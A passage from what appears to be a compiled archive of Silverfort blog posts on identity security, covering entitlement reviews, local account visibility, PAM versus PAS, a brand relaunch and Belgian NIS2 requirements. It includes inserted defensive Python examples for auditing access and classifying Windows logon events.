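                        log=ACCESS_LOG, grace=GRACE_PERIOD):
    """Return {(user, entitlement): [reasons]} for every entitlement that
    should be revoked or re-certified. Entitlements with no finding are omitted."""
    last = last_use_by_entitlement(log)
    findings = defaultdict(list)
    for user, ent, granted_for, granted_on in entitlements:
        key = (user, ent)
        record = hr.get(user)
        used = last.get(key)
        if record is None or record["status"] != "active":
            findings[key].append("owner no longer active")
            left = record["left_on"] if record else None
            if left and used and used > left:
                # A stale account being exercised is a detection, not just hygiene.
                findings[key].append(f"used on {used} after departure on {left}")
        elif record["department"] != granted_for:
            findings[key].append(
                f"granted for {granted_for}, owner now in {record['department']}")
        # Unused: never exercised since the grant, or no use inside the grace period.
        reference = used or granted_on
        if today - reference > grace:
            findings[key].append(f"not used since {reference}")
    return dict(findings)


if __name__ == "__main__":
    for (user, ent), reasons in sorted(review_entitlements(date(2025, 3, 10)).items()):
        print(f"{user:6} {ent:24} -> " + "; ".join(reasons))
```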
### From identity governance to identity security governance

#### Keeping tabs: Make sure users with access are actually using it

Organizations should continuously analyze access patterns and proactively remove unused permissions using real-time analytics and automated removal mechanisms. Implementing these measures eliminates the accumulation of unnecessary access, mitigates insider threats, and prevents lateral movement before it develops into a security incident.

#### We’re only human: IGA is not focused on NHIs, but you should be

IGA is almost entirely focused on human identities, even though non-human identities, such as service accounts, are equally prevalent and can be even more dangerous in the wrong hands. NHIs often possess excessive privileges because that's what they're created to do—perform tasks not usually allowed with basic permissions. Organizations that don't have full visibility and control over their service accounts' privileges and usage face serious security risks.

#### You get what you need: Always follow the principle of least privilege

Finding out whether users are actually using their access privileges isn't enough. Security is about knowing and managing risks, and while IGA tools do not inherently provide a security layer, they hold an important piece of the identity security puzzle. When properly integrated with security strategies, they can play a crucial role in reducing identity risks and improving overall identity security posture.

Privileges should always be kept to a minimum, and the risk associated with each entitlement should always be carefully evaluated and prioritized. The principle of least privilege should be the standard for security teams, not just as a one-off project but as a way of life.

### Final thoughts: Achieving and maintaining least privilege

IGA plays a critical role in managing identities, but it wasn’t built to enforce security. So how can you achieve least privilege?
Just remember to follow these steps and you’ll be good (if not better!):

- Move from periodic reviews to continuous validation. Annual or quarterly access reviews aren’t enough: security teams need real-time insights into excessive permissions and the ability to act immediately.
- Automate the removal of unused access. Manually removing old permissions isn’t scalable, but automating this process helps enforce least privilege without adding unnecessary workload.
- Align security with IGA. IGA provides governance, but security needs visibility into how access is actually used. Integrating the two ensures governance decisions are based on security needs.
- Continuously monitor access behavior. Tracking access activity in real time helps detect anomalies and remove permissions before they become a problem.

Remember: attackers don’t need fancy software vulnerabilities when excessive access is already out there. It is so much easier to simply log in using some old compromised credentials—especially when they carry lots of access privileges. By combining identity governance with identity security posture and real-time monitoring and enforcement, organizations can make sure users only have the access they actually need, thereby shrinking their identity attack surface and limiting lateral movement.

---

- Published: 2025-03-18
- Modified: 2025-03-19
- URL: https://www.silverfort.com/blog/silverfort-named-a-fast-company-most-innovative-company/

The World’s Most Innovative Companies Award by Fast Company is the definitive source for recognizing organizations that transform industries and shape society. Today, we’re celebrating that Fast Company has named Silverfort a 2025 Most Innovative Company. We are honored to be listed in the security category alongside others who are pushing the boundaries of what’s possible to create a more secure world.

More than 1,000 enterprises trust Silverfort, and our gross customer retention rate remains high at 94%.
We’ve raised more than $220M in funding from leading investors, and we’ve grown to over 450 team members worldwide, with revenue increasing by nearly 100% year over year for the last five years. The entire Silverfort team deserves this honor for working tirelessly to build a platform that delivers maximum security with minimal effort. Thank you to our employees, customers, and investors for all your hard work, loyalty, and unwavering support. And special thanks to our incredible Research, Engineering and Product teams for continuously delivering unmatched innovation that pushes the identity security market forward.

2024 was a big year for Silverfort. In the last six months alone, we acquired Rezonate, an impressive cloud identity security company; we released an incident response solution that flips the script on the traditional IR process; and our product team released an entirely new product—one that helps businesses go beyond managing privileged accounts to securing them (Privileged Access Security). We can proudly say our platform analyzes over 10B authentications daily, detects an average of 34K identity exposures and threats per customer, and is 17 times faster to deploy than traditional solutions.

Silverfort’s journey began with a mission to address a glaring—and growing—weakness we saw years ago in the security industry: identity. Determined to close this gap, the founding Silverfort team pioneered a unique, patented Runtime Access Protection (RAP) architecture, which connects seamlessly to an organization’s existing identity stack. It provides unparalleled visibility into all identities and environments, leverages AI for adaptive authentication and threat detection, and even protects what used to be unprotectable, like non-human identities (NHIs), legacy systems, and command-line tools.

Over the last several years, we have worked continuously to build the identity security platform companies deserve.
Unlike other solutions that solve one piece of the security puzzle or require overly complicated maintenance and deployments, Silverfort breaks down silos to eliminate security gaps and blind spots with one easy-to-deploy platform. The result? Identity security without limits. The Silverfort Identity Security Platform is the only solution that truly goes everywhere to deliver unparalleled protection, context, and visibility, without compromising on productivity. Today, over 1,000 organizations worldwide trust us to protect all identities, all resources, and all environments, all the time—and we look forward to seeing that number grow as we continue to take identity security where it has never gone before. Thank you to Fast Company for the recognition, and congratulations to the team that got us here. This is identity security done right.

---
- Published: 2025-03-11
- Modified: 2025-03-12
- URL: https://www.silverfort.com/blog/local-accounts-unlocked-how-silverfort-empowers-security-teams-with-end-to-end-visibility/

Have you ever thought about how many accounts in your environment operate outside of your visibility and control? One of the biggest identity security blind spots, often ignored by organizations but frequently used by attackers, is local accounts. Unlike domain-based accounts that security teams can easily detect and monitor, local accounts are left in the dark, with limited to no visibility into their activity and privileges. This gap has become such a critical issue that the FBI recently issued a warning urging organizations to disable local administrator accounts to reduce the risk of cyberattacks. In this blog, we’ll explore the different security risks posed by local accounts and how Silverfort’s new local authentications visibility feature helps organizations close this blind spot.

### Understanding local accounts: what they are and how they work

Local accounts come in two main types: local user accounts and local administrator accounts.
Let’s describe each type in more detail:

- Local user accounts: standard accounts with limited access permissions, typically used for basic access to an endpoint. Local users can log in and operate a system but lack the administrative privileges to make system-wide changes.
- Local administrator accounts: accounts with full control over an endpoint, allowing users to install software, modify system settings and create new accounts. Built-in local admin accounts (for instance, the default Microsoft Windows “Administrator” account) are at high risk, as attackers can exploit them for compromise and privilege escalation.

While domain accounts are centrally managed through Active Directory (AD) or an Identity Provider (IdP), local accounts exist only on an individual endpoint. From an identity management perspective, the key difference between local and domain accounts is who manages them:

- Local accounts exist and are controlled on the individual endpoint. The user has full control of the system, including privileged access to critical settings, with no visibility for security teams.
- Domain accounts, on the other hand, are managed centrally by domain administrators within Active Directory (AD) or an Identity Provider (IdP). Security teams have more visibility into domain accounts and can enforce security controls on each user by configuring specific policies and restrictions.

Local accounts are often used for administrative tasks or on legacy systems to provide access to a specific computer or device, but they lack the monitoring and advanced security controls offered by domain-based accounts.

### The hidden risks of local accounts

From a security perspective, local accounts by themselves won’t cause major security risks. But not managing them properly can have a serious impact on the organization. The main risks are lack of visibility, limited centralized management, and weaker security controls.
These challenges make local accounts a prime target for attackers looking to move laterally and escalate privileges undetected. Let’s look at the identity security risks of local accounts in more detail:

#### Lack of visibility: a blind spot in authentication monitoring

One of the biggest risks of local accounts is that security teams can’t see what they can’t track. Unlike domain-based authentications, which are centrally logged and stored, local accounts’ activities are isolated on individual endpoints and leave no records in AD or IdP logs. This means that malicious activity, including failed logins, unusual access patterns or compromised credentials, is nearly impossible to detect before it’s too late.

#### Limited centralized management: a security and operational nightmare

Local accounts are stored outside the scope of directory-based identity management, so security teams struggle not only to enforce policies but even to track who has access to what. Many organizations rely on default passwords or static credentials for local accounts without proper credential rotation, which increases the risk of unauthorized access. Without any central authentication management, organizations have fragmented security controls that attackers can easily exploit.

#### Weaker security controls: an open door for attackers

Local accounts are rarely secured with strong security controls like Multi-Factor Authentication (MFA), making them an easy target for attackers. Once a local account is compromised, it can be used to escalate privileges or move laterally across the environment without triggering any security alerts. This makes local accounts a critical blind spot in an organization’s identity security posture.

### How Silverfort enables local accounts visibility

With Silverfort you can now enhance your visibility into local account authentications, starting from Silverfort for Windows Logon version 2.1.3.
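The blind spot described above follows from where the records live: a local-account logon is written only to the endpoint's own Security log, never to AD or IdP logs. The following added example (not Silverfort code) shows how a defender can separate local from domain logons in such endpoint events and surface built-in Administrator activity; the event records are constructed samples in the shape of a JSON-lines export of Windows events 4624 and 4625.

```python
"""Classify Windows Security-log logon events as local or domain account logons.

Added example, not Silverfort code. Events 4624 (logon) and 4625 (failed logon)
carry the target account's domain field; when that field equals the machine's
own name, the account is local to that endpoint. The records below are
constructed samples exported as JSON lines.
"""
import json
from collections import Counter

# Well-known SIDs for built-in principals; these are neither local user
# accounts nor domain accounts and are reported separately.
WELL_KNOWN_SIDS = {"S-1-5-18": "SYSTEM", "S-1-5-19": "LOCAL SERVICE",
                   "S-1-5-20": "NETWORK SERVICE"}

# Constructed sample records in the shape of exported Security-log events.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Computer": "WS01.corp.example", "EventID": 4624, "TargetUserName": "alice",
     "TargetDomainName": "CORP", "TargetUserSid": "S-1-5-21-1-2-3-1105",
     "LogonType": 2, "IpAddress": "-"},
    {"Computer": "WS01.corp.example", "EventID": 4624,
     "TargetUserName": "Administrator", "TargetDomainName": "WS01",
     "TargetUserSid": "S-1-5-21-9-8-7-500", "LogonType": 10,
     "IpAddress": "10.0.0.45"},
    {"Computer": "WS01.corp.example", "EventID": 4624,
     "TargetUserName": "svc_backup", "TargetDomainName": "WS01",
     "TargetUserSid": "S-1-5-21-9-8-7-1001", "LogonType": 5, "IpAddress": "-"},
    {"Computer": "WS01.corp.example", "EventID": 4625,
     "TargetUserName": "Administrator", "TargetDomainName": "WS01",
     "TargetUserSid": "S-1-0-0", "LogonType": 3, "IpAddress": "10.0.0.77"},
    {"Computer": "WS01.corp.example", "EventID": 4624,
     "TargetUserName": "SYSTEM", "TargetDomainName": "NT AUTHORITY",
     "TargetUserSid": "S-1-5-18", "LogonType": 5, "IpAddress": "-"},
    {"Computer": "WS01.corp.example", "EventID": 4624, "TargetUserName": "bob",
     "TargetDomainName": "CORP", "TargetUserSid": "S-1-5-21-1-2-3-1200",
     "LogonType": 3, "IpAddress": "10.0.0.12"},
])


def parse_events(text):
    """Parse a JSON-lines export into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def auth_type(event):
    """Return "Local", "Domain" or "System" for one logon event."""
    if event["TargetUserSid"] in WELL_KNOWN_SIDS:
        return "System"
    # Computer may be a FQDN; the account's domain field holds the short host name.
    host = event["Computer"].split(".")[0].upper()
    return "Local" if event["TargetDomainName"].upper() == host else "Domain"


def is_builtin_admin(event):
    """True when the event targets the built-in local Administrator (RID 500).

    Failed logons (4625) carry the null SID, so for those the account name is
    the only clue; a renamed Administrator account would not be caught that way.
    """
    if auth_type(event) != "Local":
        return False
    if event["TargetUserSid"].endswith("-500"):
        return True
    return event["EventID"] == 4625 and event["TargetUserName"].lower() == "administrator"


def summarize(events):
    """Count logons by auth type and collect local built-in Administrator activity."""
    by_type = Counter(auth_type(e) for e in events)
    local_failures = sum(1 for e in events
                         if e["EventID"] == 4625 and auth_type(e) == "Local")
    admin = [(e["EventID"], e["TargetUserName"], e["LogonType"], e["IpAddress"])
             for e in events if is_builtin_admin(e)]
    return {"by_type": dict(by_type), "local_failures": local_failures,
            "builtin_admin": admin}


if __name__ == "__main__":
    print(summarize(parse_events(SAMPLE_EVENTS)))
```

A logon type of 10 (RemoteInteractive) or 3 (Network) against a local account is the combination worth reviewing first, since it is exactly the kind of remote use of a local credential that central logs never show.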
Screenshot: Silverfort’s authentication logs screen provides enhanced visibility for local accounts

When a local user accesses a Windows machine with Silverfort for Windows Logon installed, the authentication is recorded with the auth type “Local”, and you gain complete visibility into these access attempts from the Silverfort Logs screen by filtering on Auth type = “Local”.

Video: Example of how to filter local user authentications in Silverfort's logs screen

This new product capability allows you to track local logons for Windows. By filtering local account access attempts, you can quickly identify malicious activity, including potential credential misuse.

### Shining a light on local accounts: the first step to protection

Local accounts have always been a security blind spot that attackers can use as an easy entry point to compromise an environment and stay unnoticed. Without visibility into these accounts’ authentication activity, you could not detect or respond to malicious activity before it escalates. With Silverfort’s real-time visibility into local account authentications, you can finally bring this hidden layer of identity security out of the dark and monitor, track and investigate these identities. This is solid ground from which to start towards complete security and protection of local accounts.

Ready to explore hidden local accounts in your environment? If you are an existing customer, please reach out to your customer success manager or schedule a call with one of our experts.

---
- Published: 2025-03-06
- Modified: 2025-03-10
- URL: https://www.silverfort.com/blog/how-pas-and-pam-work-together-to-protect-privileged-admin-credentials/

Admin accounts are undoubtedly the ultimate prize for attackers when it comes to privileged users.
These accounts are the most privileged users, holding the keys to the kingdom: they can grant access to all systems, data, and core infrastructure of the organization. If such an account is compromised, an attacker can move laterally across the organization without being detected. Until recently, it was believed that traditional security approaches were sufficient to protect admin accounts. However, with the development of new attack methods and the evolution of attack surfaces, securing these accounts' credentials requires a more modern and proactive approach. To prevent attackers from compromising admin credentials, organizations must change their mindset from a reactive to a real-time approach. In this article, we’ll explain the security implications of admin users, the key differences between Privileged Access Management (PAM) and Silverfort Privileged Access Security (PAS) when it comes to protecting admin accounts, and how PAM and PAS work together to provide complete protection coverage for all privileged admin accounts.

### Security implications of privileged admin accounts

Typically, privileged admin accounts have elevated permissions over critical systems within an organization, including identity infrastructure, databases, domain controllers, etc. The security implications are many, but let's examine the risk of compromised admin credentials from a security perspective. When admin credentials are compromised, attackers use them to run lateral movement attacks, escalating privileges and executing advanced persistent threats (APTs) without being detected. Unlike standard user accounts, admin accounts can bypass various security controls in most organizations, allowing attackers to keep a foothold in a compromised environment without being detected.
Once an attacker exploits compromised passwords, data can be exfiltrated, ransomware can be deployed, or authentication mechanisms can be modified to create backdoors into the network. For example, in an Active Directory (AD) environment, the compromise of a Domain Admin account can lead to a full domain takeover, enabling adversaries to forge Kerberos tickets (Golden Ticket attacks), create rogue admin accounts, or disable MFA protections. Because their activities look legitimate, detecting the misuse of privileged admin accounts is challenging. Although traditional security and SIEM solutions provide logs, it is difficult to distinguish legitimate admin actions from malicious activity. These security implications are forcing organizations to rethink how they manage and protect their privileged users. Some organizations will implement, or already have implemented, a PAM project, while others will consider more modern approaches that use real-time prevention and Just-In-Time access policies. However, which is the best option?

### Understanding the difference between PAM and PAS

There is no simple or easy answer to the question of which approach is best for securing privileged admin users, PAM or another approach. To better understand the approach an organization should take, let us examine the differences between traditional PAM solutions and a more modern approach to privileged access such as PAS. PAM (Privileged Access Management) typically focuses on securing and monitoring credentials, ensuring that privileged accounts are properly managed, rotated, and controlled. It often relies on methods like credential vaulting, session management, and role-based access control to enforce least-privilege access to critical systems. However, PAM may still allow broader access to systems, which can be compromised in case of a security breach.
Silverfort PAS (Privileged Access Security), on the other hand, is a more modern approach to securing privileged access, which focuses on tightly controlling admin access and limiting the attack surface. PAS works with the concept of tiered user levels (Tier 0, Tier 1, etc.) to segment access and minimize the risk of lateral movement or privilege escalation during an attack. In the event of credential compromise, PAS ensures that only certain resources are accessible, and with Just-In-Time (JIT) policy capabilities it limits the time frame in which privileged access is granted, further reducing the risk of unauthorized use.

| | PAM | Silverfort PAS |
| --- | --- | --- |
| Discovery & Classification | ● Privileged accounts are discovered once and not continuously monitored ● Relying on static lists & naming conventions instead of real authentications | ● Automated discovery and classification of privileged accounts based on actual authentications ● Detect and alert when identifying risky cross-tiering |
| Privileged Accounts Escalation | ● Privileged accounts can bypass the PAM proxy and be used from unintended locations ● Accounts can easily exceed their intended purpose | ● Limit the use of any privileged account to exactly where and how it needs to be used (sources, destinations, protocols – all automatically recommended by Silverfort) ● Block cross-tier authentication for personal and shared accounts |
| Reducing The Attack Surface | ● Even vaulted accounts remain accessible 24/7, increasing their chances of being compromised even when rarely used | ● Enforcing least privilege with Just-in-time (JIT) access to reduce the risk of overexposure and unnecessary access ● Make privileged accounts completely unusable until they are needed |

### Closing the gaps: Why Silverfort PAS is the perfect companion to PAM

While PAM is a solid approach to securing privileged admin accounts, it is not without its challenges.
Traditional PAM solutions often struggle to fully discover and manage all privileged users, leaving some unaccounted for and vulnerable to compromise. Additionally, rotating credentials every 30 days is no longer sufficient to counter live attacks, and the credential checkout process can potentially bypass some security measures. These security blind spots highlight the need for more real-time protection, and that’s where Silverfort PAS comes in. By integrating PAS into the PAM journey, organizations can achieve complete identity security for all privileged users. Now, let’s explore four key ways Silverfort PAS works together with PAM to provide end-to-end protection for admin accounts.

### Automated discovery of all users

Among the most challenging aspects of PAM is the fact that it only secures the accounts it is aware of. The reality is that many organizations have hidden, unmanaged, or even forgotten privileged identities that remain outside the visibility of PAM. This is where PAS fills the gap. While PAM shows you what you know, PAS automatically detects what you are unaware of. By continuously monitoring all authentication activity and identity traffic, PAS detects all privileged users—including non-human identities (NHIs), service accounts, shadow admins, and other overlooked identities. Together, PAM and PAS ensure complete visibility and security coverage, leaving no privileged account unprotected.

### Prevent admin abuse

PAM solutions secure privileged credentials by storing them in a vault and enforcing controlled access. However, once an admin retrieves credentials, PAM has limited visibility into how they are used. This creates a risk of credential misuse, whether intentional or due to compromise. PAS enhances PAM’s security by deploying virtual fencing, providing organizations with strong security controls over privileged accounts by restricting their access to only the necessary resources, while automatically blocking unauthorized or excessive access.
PAS dynamically enforces least privilege policies by limiting privileged account usage to predefined sources, destinations, and protocols—effectively preventing lateral movement and privilege escalation attacks. Even after credentials are checked out from the vault, PAS ensures that admin activity remains secure, preventing unauthorized actions and reducing the risk of privilege abuse. Together, PAM and PAS provide a proactive defense against insider threats and external attacks.

### Just-in-Time (JIT) access and Universal MFA protection

PAM provides initial security by securely storing and managing privileged credentials, ensuring that only authorized users can access critical systems. It enforces access controls and ensures credential rotation, minimizing the risk of exposure. However, to further reduce risk, organizations need more dynamic, time-sensitive protection. This is where PAS can provide another layer of security with Just-In-Time (JIT) access capabilities. PAS enables organizations to enforce JIT access policies by granting privileged access only when needed, for a limited period, and automatically revoking it once the access is not needed. In addition, PAS enhances PAM’s protection with universal MFA, ensuring that every access request is thoroughly protected, regardless of the system or resource being accessed. Together, PAM and PAS ensure privileged accounts are protected at every stage—providing both initial security and continuous protection.

### Securing the PAM journey

During the PAM deployment journey, privileged accounts often face periods where they are not fully protected with security controls, leaving them vulnerable to compromise. While PAM ensures privileged accounts are secured once fully implemented, the process of deploying and integrating PAM can expose security gaps, particularly for admins who are configuring and managing the solution.
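The tiering, virtual fencing and JIT controls described in the comparison table and the sections above can be pictured as one policy decision per authentication request. The following added example (not Silverfort's policy engine) models that decision: a fence recommended from observed authentications, cross-tier denial, and an account that is unusable until a time-boxed window is opened. Every account, host, tier and timestamp in it is constructed.

```python
"""Tier-aware access policy with virtual fencing and Just-in-Time (JIT) windows.

Added example, not Silverfort's policy engine. Accounts and resources carry a
tier and cross-tier authentication is denied; a privileged account is fenced
to the sources, destinations and protocols it has actually been seen using;
and outside an approved JIT window the account is simply unusable. Every
account, host, tier and timestamp here is constructed.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Tuple

# Constructed tier map: 0 = identity infrastructure, 1 = servers, 2 = workstations.
RESOURCE_TIER = {"DC01": 0, "SQL01": 1, "FILE01": 1, "WS-ALICE": 2}


@dataclass(frozen=True)
class Fence:
    """Where and how a privileged account may be used."""
    sources: frozenset
    destinations: frozenset
    protocols: frozenset


@dataclass
class Account:
    name: str
    tier: int
    privileged: bool = False
    fence: Optional[Fence] = None
    # Approved (start, end) windows; an empty list means never usable.
    jit_windows: List[Tuple[datetime, datetime]] = field(default_factory=list)


def learn_fence(history):
    """Recommend a fence from observed (source, destination, protocol) tuples.

    The fence comes from real past authentications rather than a static list,
    so it covers only what the account actually does.
    """
    return Fence(frozenset(s for s, _, _ in history),
                 frozenset(d for _, d, _ in history),
                 frozenset(p for _, _, p in history))


def grant_jit(account, start, minutes):
    """Open a time-boxed window in which the privileged account becomes usable."""
    account.jit_windows.append((start, start + timedelta(minutes=minutes)))


def evaluate(account, source, destination, protocol, now):
    """Return (allowed, reason) for a single authentication request."""
    dest_tier = RESOURCE_TIER.get(destination)
    if dest_tier is None:
        return False, "unknown destination"
    # Tiering: an account may only reach resources in its own tier.
    if dest_tier != account.tier:
        return False, f"cross-tier: tier {account.tier} account to tier {dest_tier} resource"
    if not account.privileged:
        return True, "allow (unprivileged account, no fence)"
    # Virtual fencing: privileged use is limited to the learned sources,
    # destinations and protocols.
    fence = account.fence
    if fence is not None:
        if source not in fence.sources:
            return False, f"outside fence: source {source}"
        if destination not in fence.destinations:
            return False, f"outside fence: destination {destination}"
        if protocol not in fence.protocols:
            return False, f"outside fence: protocol {protocol}"
    # JIT: outside an approved window the account is unusable.
    if not any(start <= now < end for start, end in account.jit_windows):
        return False, "no active JIT window: privileged account is unusable"
    return True, "allow"


if __name__ == "__main__":
    t0 = datetime(2025, 3, 1, 9, 0, tzinfo=timezone.utc)
    seen = [("JUMP01", "SQL01", "RDP"), ("JUMP01", "FILE01", "SMB")]
    sqladmin = Account("sqladmin", tier=1, privileged=True, fence=learn_fence(seen))
    print(evaluate(sqladmin, "JUMP01", "SQL01", "RDP", t0))  # denied: no JIT window yet
    grant_jit(sqladmin, t0, 60)
    print(evaluate(sqladmin, "JUMP01", "SQL01", "RDP", t0 + timedelta(minutes=5)))
    print(evaluate(sqladmin, "WS-ALICE", "SQL01", "RDP", t0 + timedelta(minutes=5)))
    print(evaluate(sqladmin, "JUMP01", "DC01", "RDP", t0 + timedelta(minutes=5)))
```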
PAS adds a critical layer of protection throughout the entire PAM journey, securing admin accounts from day one against potential threats during the deployment phase. By monitoring authentication activity in real time and enforcing JIT and least privilege policies from the start, PAS ensures that admins are continuously protected against privilege escalation and unauthorized access, even before PAM is fully operational. This end-to-end protection reduces the risk of compromise and strengthens the overall PAM deployment process.

### Proactive protection for privileged admin accounts: Combining PAS and PAM

It is more critical than ever to secure privileged admin accounts, since these accounts have access to an organization's most sensitive systems and data. Even though traditional PAM solutions provide a foundation for security, they tend to leave gaps that make admin accounts vulnerable to compromise. By implementing Silverfort PAS with PAM, organizations can achieve complete identity security for privileged accounts, addressing security blind spots that PAM alone cannot cover. From automated discovery and virtual fencing to Just-In-Time (JIT) access and continuous security throughout the PAM deployment journey, PAS enhances PAM’s security capabilities to provide real-time protection for all admin accounts. Looking to learn how you can change the way you secure privileged access? Contact one of our experts today.

---
- Published: 2025-02-27
- Modified: 2025-02-27
- URL: https://www.silverfort.com/blog/unveiling-silverforts-new-brand-identity-security-done-right/

No more patchworks and one-offs—break down the traditional identity silos and secure without limits. Today marks a new era for identity security, as we unveil Silverfort’s new brand. This is more than a design refresh—it’s a reaffirmation of our vision and our commitment to taking identity security further.
We are building the identity security platform the industry deserves, one that breaks free from the complexity, limitations, and compromises that turned identity into the weakest link in enterprise security. Our new brand reflects this mission, reinforcing our dedication to protecting identity in ways that were never possible before. More than 1,000 enterprises trust Silverfort to secure their identities end-to-end, and our gross customer retention rate remains high at 94%. Our product team continues to innovate at an unmatched pace, consistently delivering disruptive new products and powerful features. We’ve raised more than $220M in funding from leading investors. We've grown to over 450 team members worldwide, with revenue increasing by close to 100% year over year for the last 5 years. I couldn't be prouder of this incredible team and the impact we are making.

Thank you.

### Our journey: To where identity security has never gone before

Our journey began with a mission to address a glaring weakness we saw years ago in the security industry: identity. A weakness that has only been growing since.

Throughout many years in offensive security, cryptography, and artificial intelligence, my co-founders and I saw identity security isn't just an element of cybersecurity—it's one of the most critical conditions for success. Working in national security instilled a mindset of testing the boundaries of what's possible, and we applied this same mentality to solving the identity security problem. In the first couple of years, we failed a lot. In fact, there were several points when we feared that what we were trying to create might be technically impossible.

Enterprises needed a solution that could, in real-time, analyze every authentication and access request to every single resource, determine whether it’s malicious, and intervene in real-time to stop it if needed.
Identity teams wanted to unlock complete visibility into every identity—human or machine—across their hybrid environments for better posture management. SOC teams dreamed of having a “kill switch” during a breach, turning off authentications to reduce the blast radius and catch the attacker. Customers wanted a way to protect their cloud identities, “forgotten” legacy systems, air-gapped networks, or regularly used command-line tools. Never-ending projects to secure privileged accounts wore teams down and yet left most accounts unprotected. For years, enterprises managed identity through a patchwork of on-premises identity management tools, multiple cloud identity providers (IdPs), and a mix of bespoke identity security solutions. The problem? These tools were built in silos—many long before cloud infrastructure and modern attack techniques existed—creating critical security gaps and blind spots. This outdated approach forces enterprises to make a difficult choice: prioritize security or productivity but never achieve both. But we found a way.

### Our innovation: Runtime Access Protection (RAP)

With identity security as our sole focus and mission, and after years of research and development, we found a way to deliver end-to-end identity security—securing every dimension of identity. We can protect every type of identity, whether human or machine, on-premises or in the cloud. We extend identity protection everywhere, even to critical systems that were previously hard or impossible to defend, such as legacy systems, command-line tools, IT/OT infrastructure, and air-gapped networks.

Our approach provides complete visibility and risk-aware context, empowering you to make smarter decisions about your identity attack surface. We uncover identity exposures—misconfigurations, weak authentication protocols like NTLMv1, and many other weaknesses—and guide you toward remediation to strengthen your security posture.
And when active threats emerge, our threat detection & response capabilities, plus our unique ability to intervene in access attempts while they are happening, ensure you can stop attacks before they cause damage. We can even protect privileged accounts and non-human identities (NHIs) without having to modify them at all and do it at the largest scale. All this is possible due to our patented technology: Runtime Access Protection (RAP), which natively integrates with all the different pieces of your IAM infrastructure to continuously protect all identities, environments, and resources. Once integrated into your IAM infrastructure, RAP forwards any access request to Silverfort’s policy engine, where we analyze the request and trigger inline security controls if needed. We return our verdict on the legitimacy of the request to the IAM infrastructure, and the identity provider grants or denies access based on our ruling. The result is identity security with end-to-end visibility, cross-platform analysis for exposure management, and inline identity protection. Our technology brings identity security everywhere—and I really mean everywhere.

### Our new brand: Welcoming a new era of identity security without limits

As part of our new brand, we unveiled a new logo. Our new logo and brand embody our mission, to break free from the old approach of patchworks, one-offs and point solutions, and deliver identity security without limits.

Identity security is finally getting the attention it deserves. People realize that a single, end-to-end approach to identity security is no longer a nice-to-have—it's a must. Organizations can no longer afford fragmented solutions that create security gaps, slow response times, and increase operational complexity.

Organizations must go beyond just managing identities—it's now about proactively securing them, in real time.

Identity deserves its own security platform.
### Our Future: Identity is everything and must be secured

We are breaking down the traditional barriers between IAM, security and compliance to protect every identity everywhere with unparalleled visibility, intelligence and active protection—all in a single platform that can be implemented rapidly.

By staying ahead of emerging identity threats, enterprises can finally rise to the challenge of securing access, detecting identity risks before they cause damage, and achieving real-time, inline enforcement across all users, systems and environments. As identity threats continue to evolve with new techniques and AI-powered automation, and as organizations attempt to consolidate tools and overcome operational bottlenecks, Silverfort offers the first clear path to the future of identity security. This is identity security done right. Learn more about our platform.

---
- Published: 2025-02-09
- Modified: 2025-02-26
- URL: https://www.silverfort.com/blog/identity-security-explained-in-the-belgian-nis2-law/

Belgium was the first European country to transpose NIS2 into national law, in April, through its “NIS2 law”. This set them apart, in a positive fashion, from their French, Dutch, and German neighbours, all late in the transposition process due to political instability. In parallel, the CCB (Center for Cybersecurity Belgium), the local agency in charge of enforcing NIS2 compliance, has released the Safeonweb@work initiative. This sets out a detailed and practical framework of all the measures that are required by the law, based on an organisation’s size and sector of activity. Having pored over the CCB’s recommendations, this blog post analyses the main requirements that pertain to identity security, which all Belgian “essential” and “important” entities will need to implement. We will also highlight how Silverfort can help these organisations achieve compliance with these measures.
The CCB’s approach draws mainly from the NIST CSF framework, which identifies 5 core functions for securing information systems: identify, protect, detect, respond, and recover. The NIS2 law in Belgium requires an investment in each function proportional to the size and importance of every entity. We also find in the Safeonweb@work framework numerous references to the ISO27001 and ISO27002 standards, which establish effective measures to design and strengthen the security of information systems. These standards have achieved worldwide recognition and constitute a robust basis upon which any organization can build a cybersecurity programme.

### Protection Requirements of NIS2

Each of the 5 functions in the NIST framework has an identity component. In the CCB’s recommendations, however, the chapters on protection and detection are clearly the most relevant. The former even includes an entire section (PR.AC) dedicated to identity management, authentication, and access controls. Identity experts will find in it the main measures pertaining to securing directories and users. It is worth highlighting that at the “basic” assurance level in annex A of the Safeonweb@work document, which applies to all entities subject to NIS2 regardless of their size or level of importance, more than half of the “key” measures come precisely from the PR.AC section. It is therefore hard to overstate the extent to which identity weighs into the CCB’s framework for securing information systems. Among these key measures required for all entities subject to NIS2, we find:

- Appropriate management of users and credentials, encompassing provisioning and revoking access rights, regular audits, strong authentication on critical systems, and detection of suspicious behaviours (PR.AC-1).
- Securing remote accesses and SaaS applications with MFA (PR.AC-3).
- Implementing least privilege in access rights, particularly towards sensitive or critical systems, and separating personal and administrative accounts (PR.AC-4).
- Network security and the segmentation of critical systems (PR.AC-5).

Additional measures are also mandated for entities at the “important” or “essential” assurance level (in annexes B and C), including requirements around identification and governance for remote accesses (PR.AC-3), stricter monitoring of connections and communications at the key external and internal boundaries (PR.AC-5), a documented risk assessment, and the implementation of access controls proportionate to the risk of each transaction (PR.AC-7, at the “essential” assurance level only).

Concretely speaking, what do these measures imply? The answer varies depending on the size and level of importance of each entity. But overall, the CCB’s approach is pragmatic, only requiring tools that are already commonplace in business environments (IAM platforms, firewalls, MFA). Some additional investment will probably be necessary for essential entities operating legacy systems, since those aren’t natively compatible with modern security products. Other than that, only companies that are laggards from a cybersecurity standpoint will truly need to acquire new technologies. Beyond the PR.AC section, access controls also appear in measures designed to protect data-at-rest (PR.DS-1), prevent the loss, misuse, damage, or theft of organizational assets (PR.DS-3) and data leaks (PR.DS-5). Regular audits are also recommended – with Active Directory explicitly mentioned (PR.DS-5) – to detect privilege misconfigurations which could open an attack pathway. Finally, requirements around maintaining the integrity of critical systems (PR.DS-6) and mitigating the risks surrounding remote maintenance (PR.MA-2) probably imply session recording for privileged accesses.
### Detection Requirements of NIS2

